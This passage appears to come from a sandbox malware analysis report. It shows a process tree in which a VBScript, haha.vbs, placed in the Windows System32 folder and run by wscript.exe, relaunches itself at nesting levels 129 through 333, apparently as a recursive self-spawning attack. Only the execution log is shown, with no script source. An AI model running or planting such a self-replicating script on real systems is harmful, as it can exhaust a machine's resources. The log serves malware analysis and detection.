        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        129⤵
        
        PID:8248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        130⤵
        
        PID:8284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        131⤵
        
        PID:8340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        132⤵
        
        PID:8400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        133⤵
        
        PID:8436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        134⤵
        
        PID:8472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        135⤵
        
        PID:8544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        136⤵
        
        PID:8592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        137⤵
        
        PID:8628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        138⤵
        
        PID:8688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        139⤵
        
        PID:8736
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        140⤵
        
        PID:8784
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        141⤵
        
        PID:8868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        142⤵
        
        PID:8920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        143⤵
        
        PID:9040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        144⤵
        
        PID:9108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        145⤵
        
        PID:8204
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        146⤵
        
        PID:8504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        147⤵
        
        PID:8940
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        148⤵
        
        PID:9100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        149⤵
        
        PID:8500
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        150⤵
        
        PID:8704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        151⤵
        
        PID:8976
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        152⤵
        
        PID:9164
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        153⤵
        
        PID:8948
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        154⤵
        
        PID:8556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        155⤵
        
        PID:8856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        156⤵
        
        PID:3024
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        157⤵
        
        PID:8372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        158⤵
        
        PID:3980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        159⤵
        
        PID:9244
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        160⤵
        
        PID:9324
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        161⤵
        
        PID:9364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        162⤵
        
        PID:9436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        163⤵
        
        PID:9472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        164⤵
        
        PID:9548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        165⤵
        
        PID:9656
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        166⤵
        
        PID:9732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        167⤵
        
        PID:9808
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        168⤵
        
        PID:9916
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        169⤵
        
        PID:9956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        170⤵
        
        PID:10028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        171⤵
        
        PID:10140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        172⤵
        
        PID:10212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        173⤵
        
        PID:1712
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        174⤵
        
        PID:9292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        175⤵
        
        PID:9408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        176⤵
        
        PID:9480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        177⤵
        
        PID:9524
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        178⤵
        
        PID:9592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        179⤵
        
        PID:9628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        180⤵
        
        PID:9680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        181⤵
        
        PID:9752
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        182⤵
        
        PID:9820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        183⤵
        
        PID:9860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        184⤵
        
        PID:9948
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        185⤵
        
        PID:9984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        186⤵
        
        PID:10076
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        187⤵
        
        PID:10136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        188⤵
        
        PID:880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        189⤵
        
        PID:9316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        190⤵
        
        PID:10388
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        191⤵
        
        PID:10484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        192⤵
        
        PID:10652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        193⤵
        
        PID:10864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        194⤵
        
        PID:11036
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        195⤵
        
        PID:11184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        196⤵
        
        PID:10320
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        197⤵
        
        PID:10376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        198⤵
        
        PID:10700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        199⤵
        
        PID:10932
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        200⤵
        
        PID:11016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        201⤵
        
        PID:5328
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        202⤵
        
        PID:10276
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        203⤵
        
        PID:10404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        204⤵
        
        PID:10500
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        205⤵
        
        PID:10564
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        206⤵
        
        PID:10576
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        207⤵
        
        PID:3856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        208⤵
        
        PID:11064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        209⤵
        
        PID:11020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        210⤵
        
        PID:10588
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        211⤵
        
        PID:10768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        212⤵
        
        PID:10852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        213⤵
        
        PID:11240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        214⤵
        
        PID:1900
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        215⤵
        
        PID:11084
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        216⤵
        
        PID:10300
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        217⤵
        
        PID:10956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        218⤵
        
        PID:9008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        219⤵
        
        PID:11172
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        220⤵
        
        PID:1720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        221⤵
        
        PID:11280
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        222⤵
        
        PID:11316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        223⤵
        
        PID:11360
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        224⤵
        
        PID:11404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        225⤵
        
        PID:11456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        226⤵
        
        PID:11500
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        227⤵
        
        PID:11536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        228⤵
        
        PID:11572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        229⤵
        
        PID:11616
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        230⤵
        
        PID:11660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        231⤵
        
        PID:11704
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        232⤵
        
        PID:11748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        233⤵
        
        PID:11788
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        234⤵
        
        PID:11836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        235⤵
        
        PID:11880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        236⤵
        
        PID:11924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        237⤵
        
        PID:11968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        238⤵
        
        PID:12012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        239⤵
        
        PID:12056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        240⤵
        
        PID:12096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        241⤵
        
        PID:12152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        242⤵
        
        PID:12188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        243⤵
        
        PID:12240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        244⤵
        
        PID:11608
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        245⤵
        
        PID:5016
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        246⤵
        
        PID:12492
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        247⤵
        
        PID:12632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        248⤵
        
        PID:12812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        249⤵
        
        PID:12992
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        250⤵
        
        PID:13148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        251⤵
        
        PID:13244
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        252⤵
        
        PID:12472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        253⤵
        
        PID:12612
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        254⤵
        
        PID:4456
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        255⤵
        
        PID:13088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        256⤵
        
        PID:13192
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        257⤵
        
        PID:13304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        258⤵
        
        PID:11308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        259⤵
        
        PID:12560
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        260⤵
        
        PID:12680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        261⤵
        
        PID:12964
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        262⤵
        
        PID:12984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        263⤵
        
        PID:12592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        264⤵
        
        PID:7516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        265⤵
        
        PID:12408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        266⤵
        
        PID:12904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        267⤵
        
        PID:4120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        268⤵
        
        PID:4648
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        269⤵
        
        PID:13128
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        270⤵
        
        PID:1628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        271⤵
        
        PID:12312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        272⤵
        
        PID:4020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        273⤵
        
        PID:12920
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        274⤵
        
        PID:10784
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        275⤵
        
        PID:8080
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        276⤵
        
        PID:8512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        277⤵
        
        PID:12664
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        278⤵
        
        PID:13008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        279⤵
        
        PID:13348
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        280⤵
        
        PID:13384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        281⤵
        
        PID:13436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        282⤵
        
        PID:13496
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        283⤵
        
        PID:13536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        284⤵
        
        PID:13584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        285⤵
        
        PID:13652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        286⤵
        
        PID:13700
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        287⤵
        
        PID:13748
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        288⤵
        
        PID:13792
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        289⤵
        
        PID:13828
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        290⤵
        
        PID:13888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        291⤵
        
        PID:13936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        292⤵
        
        PID:13980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        293⤵
        
        PID:14032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        294⤵
        
        PID:14076
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        295⤵
        
        PID:14120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        296⤵
        
        PID:14180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        297⤵
        
        PID:14264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        298⤵
        
        PID:14316
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        299⤵
        
        PID:9012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        300⤵
        
        PID:13864
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        301⤵
        
        PID:12144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        302⤵
        
        PID:1480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        303⤵
        
        PID:13428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        304⤵
        
        PID:10184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        305⤵
        
        PID:2528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        306⤵
        
        PID:3620
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        307⤵
        
        PID:10124
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        308⤵
        
        PID:14340
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        309⤵
        
        PID:14372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        310⤵
        
        PID:14428
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        311⤵
        
        PID:14520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        312⤵
        
        PID:14572
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        313⤵
        
        PID:14628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        314⤵
        
        PID:14696
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        315⤵
        
        PID:14764
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        316⤵
        
        PID:14840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        317⤵
        
        PID:14936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        318⤵
        
        PID:15008
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        319⤵
        
        PID:15060
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        320⤵
        
        PID:15108
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        321⤵
        
        PID:15180
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        322⤵
        
        PID:15240
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        323⤵
        
        PID:15284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        324⤵
        
        PID:13528
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        325⤵
        
        PID:3740
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        326⤵
        
        PID:14536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        327⤵
        
        PID:14720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        328⤵
        
        PID:14912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        329⤵
        
        PID:2152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        330⤵
        
        PID:4384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        331⤵
        
        PID:4544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        332⤵
        
        PID:15308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        333⤵
        
        PID:14468
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
